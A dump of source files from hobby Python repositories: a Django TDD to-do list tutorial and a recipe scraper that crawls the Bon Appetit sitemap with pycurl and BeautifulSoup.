"num_lines": 14,
"path": "/comptes/views.py",
"repo_name": "Haury-Tech/Melanated-Mamas",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\nfrom django.http import HttpResponse\n\n# Create your views here.\n\n\ndef index(request):\n #return HttpResponse(\"Hello, world. You're at the account index.\")\n return render(request, 'comptes/pages/index.html', locals())\n\ndef login(request):\n #return HttpResponse(\"Hello, world. You're at the account index.\")\n return render(request, 'comptes/pages/login.html', locals())\n\n"
},
{
"alpha_fraction": 0.47891566157341003,
"alphanum_fraction": 0.6987951993942261,
"avg_line_length": 15.600000381469727,
"blob_id": "2c1d4c310320caeee9d4342514f2b72e7b48644a",
"content_id": "3477d7dd09d97139ef26ccdd2b4538d5eab2ae93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 332,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 20,
"path": "/requirements.txt",
"repo_name": "Haury-Tech/Melanated-Mamas",
"src_encoding": "UTF-8",
"text": "asgiref==3.3.4\ncertifi==2020.12.5\ncffi==1.14.5\nchardet==4.0.0\ncryptography==3.4.7\ndefusedxml==0.7.1\nDjango==3.0.5\ndjango-allauth==0.44.0\ndjongo==1.3.4\nidna==2.10\noauthlib==3.1.0\npycparser==2.20\nPyJWT==2.0.1\npymongo==3.11.3\npython3-openid==3.2.0\npytz==2021.1\nrequests==2.25.1\nrequests-oauthlib==1.3.0\nsqlparse==0.2.4\nurllib3==1.26.4\n"
}
] | 3 |
dcroc16/superlists
|
https://github.com/dcroc16/superlists
|
bf0aac312c524ada596aeae3deb1b16218a0f108
|
a88223022ef8293f8768933fbb50cc69fa8484b8
|
15465ffb90cce4166bfa51e4666680b330cd00ec
|
refs/heads/master
| 2021-01-23T07:09:30.576030 | 2015-02-08T05:42:35 | 2015-02-08T05:42:35 | 30,478,876 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8387096524238586,
"alphanum_fraction": 0.8387096524238586,
"avg_line_length": 30,
"blob_id": "8298304ee880c80002c6e1784d036afffe4e4331",
"content_id": "8445a27ba06c6ae8def880ae29eeff9e166abf83",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 62,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 2,
"path": "/README.md",
"repo_name": "dcroc16/superlists",
"src_encoding": "UTF-8",
"text": "# superlists\nCreating a website using Test Driven Development\n"
},
{
"alpha_fraction": 0.7042071223258972,
"alphanum_fraction": 0.708737850189209,
"avg_line_length": 27.629629135131836,
"blob_id": "838f0cc726380fa47425a1db08eb8cf1379b9ee3",
"content_id": "739ebf3c0a89900ec47d5e072f57881111fbae2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1545,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 54,
"path": "/functional_tests.py",
"repo_name": "dcroc16/superlists",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nclass NewVisitorTest(unittest.TestCase):\n\tdef setup(self):\n\t\tself.browser = webdriver.Firefox()\n\t\tself.browser.implicitly_wait(3)\n\n\tdef tearDown(self):\n\t\tself.browser.quit()\n\n\tdef test_creating_a_new_list(self):\n\t\tself.setup()\n\n\t\t# User Stories\n\t\t# Edith heard about a cool new online todo app, She goes\n\t\t# to check out its homepage\n\n\t\tself.browser.get('localhost:8000')\n\n\t\t# She notices the page title and header mention to-do lists\n\t\tself.assertEqual('To-Do lists', self.browser.title)\n\t\theader_text = self.browser.find_element_by_id('h1').text\n\t\tself.assertIn('To-Do',header_text)\n\n\n\n\t\tinputbox = self.browser.find_element_by_id('id_new_item')\n\t\tself.assertEqual(\n\t\t\tinputbox.get_attribute('placeholder'),\n\t\t\t'Enter a to-do item'\n\t\t\t)\n\t\t# She is invited to enter a to-do item straight away\n\t\t\n\n\t\t# She types \"Buy Peacock Feathers\" into a text box (Edith's Hoby)\n\t\tinputbox.send_keys(Keys.ENTER)\n\n\t\ttable = self.browser.find_element_by_id('id_list_table')\n\t\trows = table.find_element_by_id('tr')\n\t\tself.assertTrue(\n\t\t\t\tany(row.text == '1: Buy peacock feathers' for row in rows)\n\t\t\t)\n\t\tself.fail('Finish the test!')\n\n\t\t# There is still a text box inviting her to add another item\n\t\t# Edith wonders whether the site will remember her list.\n\t\t# Then she sees that the site has generated a unique URL for her ==\n\t\t# She visits that URL - her to-do list is still there.\n\t\t# satisfied she goes back to sleep\n\nif __name__ == '__main__':\n\tunittest.main()"
},
{
"alpha_fraction": 0.7828947305679321,
"alphanum_fraction": 0.7828947305679321,
"avg_line_length": 24.5,
"blob_id": "8a5174ce416a6ff325f70a67237b02233b02d3fd",
"content_id": "e13e063f0a99b879ffb957d31bc3b5abc3771460",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 152,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 6,
"path": "/superlists/lists/views.py",
"repo_name": "dcroc16/superlists",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import HttpResponse\n\n# Create your views here.\ndef home_page(res):\n\treturn render(res, 'home.html')"
},
{
"alpha_fraction": 0.745233952999115,
"alphanum_fraction": 0.745233952999115,
"avg_line_length": 29.36842155456543,
"blob_id": "4b4bb657ffbd2d932e50a76f3fda1de71f74d5ae",
"content_id": "4d7e87d5b2a8609c018412fdb66c48037c4ccdfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 577,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 19,
"path": "/superlists/lists/tests.py",
"repo_name": "dcroc16/superlists",
"src_encoding": "UTF-8",
"text": "from django.test import TestCase\nfrom django.http import HttpRequest\nfrom django.core.urlresolvers import resolve\n\nfrom lists.views import home_page\n\n# Create your tests here.\nclass HomePageTest(TestCase):\n\n\tdef test_root_url_resolves_to_home_page_view(self):\n\t\tfound = resolve('/')\n\t\tself.assertEqual(found.func, home_page)\n\n\tdef test_home_page_returns_correct_html(self):\n\t\tr = HttpRequest()\n\t\tres = home_page(r)\n\t\tself.assertTrue(res.content.startswith('<html>'))\n\t\tself.assertIn('<title>To-Do lists</title>', res.content)\n\t\tself.assertTrue(res.content.endswith('</html>'))\n"
}
] | 4 |
jdevries3133/scrape-recepies
|
https://github.com/jdevries3133/scrape-recepies
|
bf182faad7265dfb27d477096116794eaa07ea62
|
c97bef237fe17ff1c11f70918affc505f2629ec4
|
19d0bea7e17c9f5cd0d3fa4938dfcdf952770c30
|
refs/heads/master
| 2021-05-21T05:35:29.724452 | 2021-02-16T02:28:55 | 2021-02-16T02:28:55 | 252,569,124 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4920634925365448,
"alphanum_fraction": 0.6961451172828674,
"avg_line_length": 15.961538314819336,
"blob_id": "d3653fd3937a23d07abc0fa1209bf9e183b2264e",
"content_id": "de6c34c59f05c5b7d5bc1ea89c93f6f2789ecf93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 441,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 26,
"path": "/requirements.txt",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "appnope==0.1.0\nbackcall==0.1.0\nbeautifulsoup4==4.8.2\ncertifi==2019.11.28\nchardet==3.0.4\ndecorator==4.4.2\nfaster-than-requests==0.9.8\nidna==2.9\nipython==7.13.0\nipython-genutils==0.2.0\njedi==0.16.0\nline-profiler==3.0.2\nlxml==4.6.2\nparso==0.6.2\npexpect==4.8.0\npickleshare==0.7.5\nprompt-toolkit==3.0.5\nptyprocess==0.6.0\npycurl==7.43.0.5\nPygments==2.6.1\nrequests==2.23.0\nsix==1.14.0\nsoupsieve==2.0\ntraitlets==4.3.3\nurllib3==1.25.8\nwcwidth==0.1.9\n"
},
{
"alpha_fraction": 0.5204903483390808,
"alphanum_fraction": 0.524810254573822,
"avg_line_length": 29.80935287475586,
"blob_id": "9eb63a8e4ed42712045baf461785e74b479a7e63",
"content_id": "4406d5242e75aef6baf6718db905499afbef210c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8565,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 278,
"path": "/recipe_finder/site_crawlers/abc_crawlers.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "from abc import ABC, abstractmethod\nfrom datetime import datetime\nfrom io import BytesIO\nimport logging\nimport os\nimport shelve\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\n\nimport certifi\nimport pycurl\n\nlogging.basicConfig(\n filename='abc_crawlers.log',\n level='DEBUG',\n filemode='w',\n format='%(asctime)s %(levelname)-8s %(message)s'\n)\n\nclass Crawler(ABC):\n def __init__(self, sitemap_url, context):\n \"\"\"\n Things to put in context:\n Site name (string)\n Cache key\n \"\"\"\n self.sitemap = sitemap_url\n self.context = context\n\n # there should be a separate cache created for every new child\n self.cache_dir = (\n os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n 'cache'\n )\n )\n\n # all instances will use the same database\n self.cache_path = os.path.join(\n self.cache_dir,\n 'crawler_cache'\n )\n\n if self.context['read cache']:\n self.url_dict = self.read_cache_func()\n else:\n self.url_dict = {}\n\n if self.context['debug mode']:\n self.html_dir = os.path.join(self.cache_dir, 'html_pages')\n\n def write_cache_func(self):\n with shelve.open(self.cache_path, protocol=5) as db:\n db[self.context['cache key']] = self.url_dict\n\n def read_cache_func(self):\n with shelve.open(self.cache_path, protocol=5) as db:\n cached_url_dict = db[self.context['cache key']]\n return cached_url_dict\n\n def cache_recipe_page_responses(self):\n \"\"\"\n Make a request to all the recipe pages, and save them in the\n database.\n\n Make a locally stored html page for each response, which we can\n use for development.\n\n '2014_3_week_4.html'\n\n dict = {\n 'url groups': {\n 'recipe pages': {\n 'parent url': [child urls],\n 'parent url2': [child urls2],\n }\n 'other urls': {\n 'parent url': [other urls],\n (etc)\n }\n }\n }\n \"\"\"\n logging.debug('Pulling recipe pages.')\n # dict data => [(url, (context))] --- that'll be var \"input_list\"\n tuples_for_func = []\n # context = {'supercat': 'super', 'subcat': 'sub'}\n for sg_name, sg_content in self.url_dict['url groups'].items():\n # sg_content will be a dict {'parent': [children]}\n for parent, children in sg_content.items():\n context = {'supercat': sg_name, 'subcat': parent}\n for child in children:\n tuples_for_func.append(\n (child, context)\n )\n logging.debug('Making requests to recipe pages')\n\n for i in range(0, len(tuples_for_func), 500):\n # run operation on a subset at a time, to avoid memory binding.\n subset = tuples_for_func[i:(i + 500)]\n logging.debug(f'Saving the following pages:\\n{subset}')\n\n # results are going to be (response, url, context)\n results = self.multithread_requests(subset)\n logging.debug(f'Got results: {len(results)}')\n mthr_saves = []\n for result in results:\n # (html, url, context)]\n folder = os.path.join(self.html_dir, result[2]['supercat'])\n if not os.path.exists(folder):\n os.mkdir(folder)\n\n # make filename\n fn1 = self.parse_parent(result[2]['subcat'])\n fn2 = self.file_name_from_url(result[1])\n filename = f'{fn1} {fn2}.html'\n path = os.path.join(folder, filename)\n\n mthr_saves.append((path, result[0]))\n\n\n with ThreadPoolExecutor(max_workers=200) as executor:\n threads = executor.map(self.multithreaded_html_save, mthr_saves)\n\n def cache_state(self):\n # walk through cache\n # return super-categories\n # return length of each\n # return average creation date\n supercats = [item for item in os.listdir(self.html_dir) if item [0] != '.']\n\n\n return_dict = {'html_dir': self.html_dir, 'supercats': {}}\n\n for folder in supercats:\n creation_dates = []\n for file in os.listdir(os.path.join(self.html_dir, folder)):\n unix_creation = os.path.getmtime(\n os.path.join(self.html_dir, folder, file))\n\n creation_dates.append(unix_creation)\n\n avg_timestamp = sum(creation_dates) // len(creation_dates)\n date = datetime.fromtimestamp(avg_timestamp)\n return_dict['supercats'][folder] = {\n 'num_of_files': len(os.listdir(os.path.join(self.html_dir, folder))),\n 'avg_creation_date': date\n }\n\n return return_dict\n\n\n def multithreaded_html_save(self, tupl):\n path, html = tupl\n with open(path, 'w') as file:\n file.write(html)\n logging.debug(f'Saved {path} to the hard drive.')\n\n\n def cache_urls(self):\n # reference 'read debug cache' attribute\n write_cache = not self.context['read debug cache']\n\n # read cache\n if not write_cache:\n with shelve.open(self.cache_path, protocol=5) as db:\n self.all_urls = db[self.context['url cache key']]\n\n # write cache\n if write_cache:\n\n # check for self.all_urls attribute\n if not hasattr(self, 'all_urls'):\n raise Exception(\n 'Cannot cache urls, because self.get_urls() has '\n 'not yet been called, and self.all_urls is not defined.'\n )\n\n # write\n with shelve.open(self.cache_path, protocol=5) as db:\n db[self.context['url cache key']] = self.all_urls\n\n logging.debug(f'lpc: {self.all_urls}')\n\n return self.all_urls\n\n def multithread_requests(self, urls):\n\n if isinstance(urls[0], tuple):\n mode = 'tuples'\n\n if isinstance(urls[0], str):\n mode = 'regular'\n\n response_and_url = []\n with ThreadPoolExecutor(max_workers=200) as executor:\n if mode == 'regular':\n threads = [\n executor.submit(\n self.make_pycurl_request, url\n )\n for url\n in urls\n ]\n\n if mode == 'tuples':\n threads = [\n executor.submit(\n self.make_pycurl_request, url, context\n )\n for url, context\n in urls\n ]\n\n\n for r in as_completed(threads):\n try:\n response_and_url.append(r.result())\n\n except Exception as e:\n logging.warning(e)\n\n return response_and_url\n\n def make_pycurl_request(self, url, context=None):\n try:\n buffer = BytesIO()\n crl = pycurl.Curl()\n crl.setopt(crl.URL, url)\n crl.setopt(crl.WRITEDATA, buffer)\n crl.setopt(crl.CAINFO, certifi.where())\n crl.perform()\n\n crl.close()\n\n logging.debug(f'response recieved from {url}')\n\n except Exception as e:\n raise Exception(f'{url} failed because of {e}.')\n\n if context:\n return buffer.getvalue().decode(), url, context\n\n return buffer.getvalue().decode(), url\n\n @abstractmethod\n def parse_parent(self):\n \"\"\"\n Parse the parent urls from the standard dict above, so that they\n can be used for folder or file names in the above method.\n \"\"\"\n pass\n\n @abstractmethod\n def get_urls(self):\n \"\"\"\n Recursively crawl through the site map, and get all\n urls for recipe pages.\n \"\"\"\n pass\n\n @abstractmethod\n def recursive(self, links_to_do, cache=False):\n \"\"\"\n Crawl through the sitemap, and get urls\n \"\"\"\n pass\n\n @abstractmethod\n def make_url_dict(self):\n \"\"\"\n Go through the recursively discovered list of urls, and filter them\n down to what we actually want; urls which are pages of recipes.\n \"\"\"\n pass\n\n @abstractmethod\n def file_name_from_url(self):\n pass\n"
},
{
"alpha_fraction": 0.7873753905296326,
"alphanum_fraction": 0.7873753905296326,
"avg_line_length": 29,
"blob_id": "216be3edd5b6b83a306c50edeebf278d24619600",
"content_id": "05e97b6ec1d5ea86ce37cc21b146448c632e7b14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 301,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 10,
"path": "/recipe_finder/__init__.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "\"\"\"\n\nOverall, this module aggregates recipes from all over the place. It will\nultimately return a recipe object instance for each recipe, consisting of the\nrecipe's name, ingredients, author, prep time, etc.\n\n\"\"\"\n\nfrom .site_crawlers import BonApetitCrawler\nfrom .html_parsers import BonApetitParser\n\n"
},
{
"alpha_fraction": 0.7773109078407288,
"alphanum_fraction": 0.7773109078407288,
"avg_line_length": 33.14285659790039,
"blob_id": "b6c0e1699cf4f3bfe12bf305e6772233d97b493f",
"content_id": "8c34180de6c53fb63938ff510555128b09aa2981",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 238,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 7,
"path": "/recipe_finder/recipe_objects/__init__.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "\"\"\"\n\nThis module recieves clean data from the html_to_recipe_object parser module.\nUltimately, the best thing to do will probably be to use this module to begin to\nconsider how this data might find its way into a relational database.\n\n\"\"\""
},
{
"alpha_fraction": 0.6002277731895447,
"alphanum_fraction": 0.6002277731895447,
"avg_line_length": 34.119998931884766,
"blob_id": "c53649473fdf8d24a647d6d2f2ff4363adaf9515",
"content_id": "b82004cca0037e248f27651909e99d01918c76a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 878,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 25,
"path": "/recipe_finder/recipe_objects/abc_recipes.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "from abc import ABC, abstractmethod\n\nclass Recipes:\n def __init__(self, title, ingredients, extra_info=None):\n \"\"\"\n Each recipe object represents one single recipe, from any given site.\n If this were developed into a django web app, this class would probably\n be altered into a model, which would store its instances in a database,\n and be drawn on by the front end.\n\n Important attributes for each recipe are:\n name\n author\n url\n ***ingredient list***\n prep time\n \"\"\"\n # these are the only two mandatory attributes\n self.title = title\n self.ingredients = ingredients\n\n # extra_info may include author, prep time, maybe others?\n if extra_info:\n for key, value in extra_info.items():\n setattr(self, key, value)\n"
},
{
"alpha_fraction": 0.6104850769042969,
"alphanum_fraction": 0.6134247779846191,
"avg_line_length": 25.86842155456543,
"blob_id": "44cd6ffe97d1db802117b43281967ecbc0edfa92",
"content_id": "5eede29e07eb9c8ba7b53f9c7f4076da6832a73f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2041,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 76,
"path": "/recipe_finder/recipe_objects/ba_recipes.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "from abc import ABC\nfrom copy import copy\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nfrom io import BytesIO\nimport logging\nimport os\nimport shelve\nimport time\nimport re\nimport sys\n\nimport certifi\nimport pycurl\nfrom bs4 import BeautifulSoup, SoupStrainer\n\nfrom parsers import Parsers\n\nlogging.basicConfig(\n filename='l_main.log',\n level='DEBUG',\n filemode='w',\n format='%(asctime)s %(levelname)-8s %(message)s'\n)\n\n\nclass BonApetitScrape:\n \"\"\"\n Each instance represents a single recipe scraped from the\n bon apetit website.\n \"\"\"\n def __init__(self, url):\n\n self.url = url\n self.data = self.gather_data()\n\n\n def gather_data(self):\n \"\"\"\n Act as assistant to the constructor, performing all of the tasks\n that must be performed every time the class is instantiated:\n\n * make request and soup\n * determine the generation (age) of the soup\n * route the soup to the appropriate parsing function\n * return data structure (dictionary) that includes all the\n information that we will want from the instance:\n * recipe url\n * recipe name\n * recipe author\n * recipe ingredients\n \"\"\"\n soup = self.get_page()\n parsed_soup = self.parse(soup)\n\n return parsed_soup\n\n def parse(self, soup):\n \"\"\"\n Determine the generation of the page's soup, and return a\n response code so that the page's soup can be parsed\n appropriately\n \"\"\"\n # todo determine parser to use\n\n parse_helper = Parsers(soup)\n parse_helper.bon_apetit_2020()\n return 'response_code'\n\n def get_page(self):\n \"\"\"\n Make the request, return the beautifulsoup object.\n \"\"\"\n response = BonApetitCrawler.make_pycurl_request(self.url)\n self.response = response\n soup = BeautifulSoup(response, features='lxml')\n return soup"
},
{
"alpha_fraction": 0.4923155605792999,
"alphanum_fraction": 0.4969262182712555,
"avg_line_length": 29.82105255126953,
"blob_id": "805816cd5e8025ea5ed31984c91e535917d08f27",
"content_id": "2451a38b96a8031c48ae77deddaf2d78b48f7679",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5856,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 190,
"path": "/recipe_finder/site_crawlers/ba_crawl.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "import logging\nimport re\n\nfrom bs4 import BeautifulSoup, SoupStrainer\n\nfrom .abc_crawlers import Crawler\n\n\nlogging.basicConfig(\n filename='ba_crawl.log',\n level='DEBUG',\n filemode='w',\n format='%(asctime)s %(levelname)-8s %(message)s'\n)\n\nclass BonApetitCrawler(Crawler):\n \"\"\"\n Crawl bon apetit website. Attributes after instantiation are all\n bon appetit recipe urls.\n \"\"\"\n def __init__(self, context):\n super().__init__(\n 'https://www.bonappetit.com/sitemap',\n context\n )\n\n def get_urls(self):\n \"\"\"\n Recursively crawl through the bon apetit website, and get all\n urls.\n\n *** this now returns ALL urls, unsorted.***\n \"\"\"\n\n if self.context['read debug cache']:\n return self.cache_urls()\n\n all_urls = self.recursive([self.sitemap])\n if all_urls == []:\n logging.error('recipe pages is empty.')\n\n self.all_urls = all_urls\n return all_urls\n\n def recursive(self, links_to_do):\n \"\"\"\n tuples_found is a list of tuples that we ultimately want.\n These tuples containe two items: the https response from a url,\n and then, the url itself:\n (https_response, url_requested)\n\n This list of tuples is only appended to if it is a leaf node of\n the sitemap tree.\n \"\"\"\n\n log_msg = (str(links_to_do))\n logging.debug('=' * 80)\n logging.debug(log_msg)\n\n lol_parent_children = []\n next_level = []\n resp_tuples = self.multithread_requests(links_to_do)\n for index, resp_tuple in enumerate(resp_tuples):\n resp, url = resp_tuple\n logging.debug(f'Processed {index} of {len(resp_tuples)} responses.')\n\n # make the soup, searches the soup\n strainer = SoupStrainer('a', class_='sitemap__link', href=True)\n soup = BeautifulSoup(\n resp,\n features='html.parser',\n parse_only=strainer\n )\n hrefs = soup.find_all(\n name='a',\n href=True,\n class_='sitemap__link',\n )\n\n try:\n hrefs[0].contents[0][0]\n except IndexError:\n continue\n\n if hrefs[0].contents[0][0] != '/':\n # url is a strng; the parent url.\n # hrefs is a list; the list of children of that parent\n lol_parent_children.append(\n (\n url,\n [\n 'https://www.bonappetit.com/' + href_tag.contents[0]\n for href_tag\n in hrefs\n ]\n )\n )\n\n if hrefs[0].contents[0][0] == '/':\n links_found = [\n 'https://www.bonappetit.com'\n + i.contents[0]\n for i\n in hrefs\n ]\n next_level += links_found\n\n logging.debug('NEXT_LEVEL_CALLED')\n logging.debug(next_level[:200])\n\n if next_level:\n logging.debug(f'Called self.recursive.')\n return self.recursive(next_level)\n\n if not next_level:\n logging.debug(\n 'entered if not. Parents and Children:'\n f'\\n{lol_parent_children}'\n )\n return lol_parent_children\n\n def make_url_dict(self):\n \"\"\"\n Sort the urls into a dict that can interact with the abstract base class\n again.\n\n dict = {\n 'url groups': {\n 'recipe pages': {\n 'parent url': [child urls],\n 'parent url2': [child urls2],\n }\n 'other urls': {\n 'parent url': [other urls],\n (etc)\n }\n }\n }\n\n note: this function must be called from outside, and we are not calling\n it, so the fact that it is unfinished does not affect our ability to get\n urls.\n \"\"\"\n # write to the cache, only if we are not already reading from it.\n if self.context['debug mode']:\n self.cache_urls()\n\n if not hasattr(self, 'all_urls'):\n raise Exception(\n 'Cannot sort urls, because self.get_urls has not '\n 'been called, and self.all_urls attribute is not yet defined.'\n )\n\n 'need to rewrite to output new data structure.'\n output_dict = {\n 'url groups': {'recipe pages': {}, 'other urls': {}}\n\n }\n for parent_url, child_urls in self.all_urls:\n output_dict['url groups']['recipe pages'].update(\n {parent_url:\n [url for url in child_urls if '/recipe/' in url]}\n )\n output_dict['url groups']['other urls'].update(\n {parent_url:\n [url for url in child_urls if '/recipe/' not in url]}\n )\n\n self.url_dict = output_dict\n return output_dict\n\n def scrape_recipes_from_page(self, url):\n \"\"\"\n Possibly get more recipies out of the the recipe slideshow\n pages, and other pages that contain recipe links\n \"\"\"\n pass\n\n def parse_parent(self, parent_url):\n # get year, month, and date from sitemap url\n pattern = (r'(\\d\\d\\d\\d)&month=(\\d+)&week=(\\d)')\n url_param_regex = re.compile(pattern)\n mo = re.search(url_param_regex, parent_url[40:])\n year, month, week = mo[1], mo[2], mo[3]\n date_string = f'{year}_{month}_week_{week}'\n\n return date_string\n\n def file_name_from_url(self, url):\n return url[34:].replace('-', ' ').title()\n"
},
{
"alpha_fraction": 0.6639344096183777,
"alphanum_fraction": 0.6639344096183777,
"avg_line_length": 23.46666717529297,
"blob_id": "ada9d155a817e29a9d260c9ef03287186d9ce871",
"content_id": "ef670a18613bfdd0cc1687582f55ed318ee5d5a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 366,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 15,
"path": "/recipe_finder/site_crawlers/__main__.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "from ba_crawl import BonApetitCrawler\n\nba_context = {\n 'site name': 'Bon Apetit',\n 'cache key': 'BA Cache',\n 'url cache key': 'all_urls',\n 'read cache': False,\n 'debug mode': True,\n 'read debug cache': True,\n}\n\ncrawler = BonApetitCrawler(ba_context)\nurls = crawler.get_urls()\nurl_dict = crawler.make_url_dict()\ncrawler.cache_recipe_page_responses()"
},
{
"alpha_fraction": 0.8219178318977356,
"alphanum_fraction": 0.8219178318977356,
"avg_line_length": 35.5,
"blob_id": "7eff8bb42469367922c7886411579e36717f8901",
"content_id": "2016b0658eedc675a6862e73826b1d8c2adc4ee6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 219,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 6,
"path": "/recipe_finder/__main__.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "from site_crawlers import BonApetitCrawler, DebugContext\nfrom html_parsers import BonApetitParser\n\n# ba_crawler dev block\nba_crawler = BonApetitCrawler(DebugContext.ba_context)\nba_cache_state = ba_crawler.cache_state()\n"
},
{
"alpha_fraction": 0.45601436495780945,
"alphanum_fraction": 0.47109514474868774,
"avg_line_length": 27.428571701049805,
"blob_id": "211f14f3bcb309a45dc6d44234de6b2f4063cdb8",
"content_id": "f3caf0897115d3306db03350254a552ef8e70fc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2785,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 98,
"path": "/recipe_finder/html_parsers/bon_apetit_parsers.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\n\nfrom .abc_parsers import Parser\n\n\nclass BonApetitParser(Parser):\n\n def __init__(self):\n pass\n\n def bon_apetit_2020(self):\n \"\"\"\n Parse the newest page as of 4/1/2020 and return the final\n init data structure.\n \"\"\"\n pass\n\n def bon_apetit_2010(self):\n \"\"\"\n Parse the oldest page, circa 2010 and return the final init data\n structure.\n \"\"\"\n pass\n\n def bon_apetit_slideshow(self):\n \"\"\"\n Get all href tags in the slideshow page, sort them with regex,\n send those to be parsed in the right place.\n \"\"\"\n pass\n\n\nif __name__ == '__main__':\n pass\n\n\n\n\n# resps = self.multithread_requests([url])\n# resp, url = resps[0]\n# strainer = SoupStrainer('a', href=True)\n# soup = BeautifulSoup(\n# resp,\n# features='lxml',\n# parse_only=strainer,\n# )\n# hrefs = soup.find_all('a', href=True)\n\n# rl = []\n# for hr in hrefs:\n# try:\n# if hr['href'][4] == 's':\n# if hr['href'][26:33] == 'recipe/':\n# rl.append(hr.contents[0])\n# if hr['href'][4] == ':':\n# if hr['href'][27:34] == 'recipe/':\n# rl.append(hr.contents[0])\n# except IndexError:\n# logging.debug(f'href {hr} failed.')\n\n\n\n\n\n\n\n\n\n # for parent_url, urls in lol_parent_children:\n # logging.debug(f'start case parent_url {parent_url}')\n # logging.debug(f'startcase urls {urls}')\n\n # recipe_urls = [i for i in urls if i[27:34] == 'recipe/']\n # recipe_page_urls = [i for i in urls if i[27:34] == 'recipes']\n\n # logging.debug(f'Recipe urls to start: \\n{recipe_urls}')\n # logging.debug(f'Rec Page URLs to look at: \\n{recipe_page_urls}')\n\n # for rp_url in recipe_page_urls:\n # recipe_urls += self.scrape_recipes_from_page(rp_url)\n # logging.debug(\n # f'Got some recipe urls from {rp_url}: {recipe_urls}'\n # )\n\n # for index, url in enumerate(recipe_urls):\n # logging.debug(f'Recipe Found: {url}')\n # date_string = self.parse_parent(parent_url)\n # key = date_string + ' ' + str(index)\n # name = url[34:].replace('-', ' ').title()\n # logging.debug('indicator')\n # self.url_dict[key] = {\n # 'name': name,\n # 'url': url,\n # 'neighbors': recipe_urls,\n # 'parent_url': parent_url\n # }\n\n # logging.debug(self.url_dict)"
},
{
"alpha_fraction": 0.7730560302734375,
"alphanum_fraction": 0.7730560302734375,
"avg_line_length": 34.709678649902344,
"blob_id": "a53c940fe61df6af2da6e24540e6b6c5fc706303",
"content_id": "1cf9ddbd53d507c525e735e9d443dffadbdf1642",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1106,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 31,
"path": "/recipe_finder/html_parsers/__init__.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "\"\"\"\n\nThis module is the glue that binds site_crawlers and recipe_objects. Site\ncrawlers only crawls through the website, and downloads data to the hard disk.\nRecipe objects is only a clean object that possesses recipe attributes. For\nexample, recipe name, recipe ingredients, etc.\n\nThis parser module recieves the html pages from the site crawler, and returns\na clean, and uniform data structure which can be passed to recipe_objects.\n\nIf this project is developed into a django web app, the database models will\nprobably be directly hooked to parsers, and updated on a schedule.\n\nUltimately, from the html mess that site crawlers delivers, this module should\nreturn the following information for each recipe:\n\n * Recipe Name\n * Recipe URL\n * Recipe Ingredients\n\nAdditionally, this module may return some optional information, and downstream\nmodules should understand that this information may or may not be included for\neach recipe:\n\n * Recipe Author\n * Recipe Prep Time\n * (add add'l optional attributes, if encountered)\n\n\"\"\"\n\nfrom .bon_apetit_parsers import BonApetitParser"
},
{
"alpha_fraction": 0.8461538553237915,
